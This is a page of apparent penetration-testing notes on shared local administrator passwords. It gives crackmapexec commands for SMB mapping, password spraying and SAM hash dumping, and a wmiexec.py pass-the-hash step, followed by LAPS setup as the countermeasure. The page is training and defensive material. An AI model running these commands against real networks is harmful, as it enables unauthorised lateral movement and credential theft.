Shared Local Administrator Password

  • Typical used in Deployment Solutions

  • Easy for admins to login to various servers/machines when problem arises

  • Attackers can get hash on one machine and use it on all other machines

Shared Administrator Password

Map the Local Network

crackmapexec smb 192.168.130.1/29

Spray Username and Password across the Network

crackmapexec smb 192.168.130.1/29 -u web1admin -p 'P@ssw0rd' -d trustedsec.int

Dump the SAM database for one specific host

crackmapexec smb 192.168.130.1/29 -u web1admin -p 'P@ssw0rd' -d trustedsec.int --sam

Access the Client using the hash found in previous step

wmiexec.py WORKGROUP/administrator@192.168.130.4 -hashes <hash goes here>

Countermeasures

  • One easy way of changing this is to use Local Administrator Password Solution (LAPS) from Microsoft.

  • Change who is allowed to login over the network.

LAPS and Preventing over the network login with local accounts

In The Domain Controller Machine

  • Visit: https://aka.ms/laps

  • Download: LAPS.x64.msi

  • Installation Steps

    • Select AdmPwd GPO Extension as Entire feature will be unavailable

    • Select Management Tools as Entire feature will be installed on local hard drive

    • Select Fat client UI as Entire feature will be unavailable

After Installation of LAPS

  • Open Powershell

Import the Module we have just installed

Import-Module admpwd.ps
Update-AdmPwdADSchema
Set-AdmPwdComputerSelfPermission -Identity <"computer's distinguise name here">
Set-AdmPwdComputerSelfPermission -Identity <"computer's distinguise name here"> -AllowedPrincipals <"Group Name here">

PreviousWindows and Active Directory AttacksNextNTLM/SMB Relay

Last updated